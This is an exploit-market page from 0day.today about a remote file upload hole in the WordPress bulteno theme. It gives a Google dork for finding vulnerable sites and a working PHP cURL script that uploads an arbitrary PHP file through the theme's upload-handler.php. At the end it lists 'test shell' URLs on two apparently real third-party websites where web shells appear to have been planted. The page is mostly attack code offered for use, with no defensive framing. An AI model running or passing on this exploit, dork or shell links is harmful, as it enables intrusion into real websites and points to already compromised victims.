[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress bulteno-theme Themes Remote File Upload Vulnerability

Author
iskorpitx
Risk
[
Security Risk High
]
0day-ID
0day-ID-21515
Category
web applications
Date add
13-11-2013
Platform
php
###################################################################################################
# Exploit Title: WordPress bulteno-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/bulteno/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/bulteno-theme/"
# Tested on : Windows/Linux
###################################################################################################

# Exploit


<?php 
$uploadfile="upload.php"; 
$ch = curl_init("http://127.0.0.1/wp-content/themes/bulteno-theme/functions/upload-handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); 
curl_close($ch); 
print "$postResult"; 
?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php


_________________________________

All http://www.mavi1.org members


---
test shell
http://www.nmgk-oslosenter.no/wp-content/uploads/2013/11/ttt.php
http://shane.ro/wp-content/uploads/2013/11/ttt.php

#  0day.today [2024-12-26]  #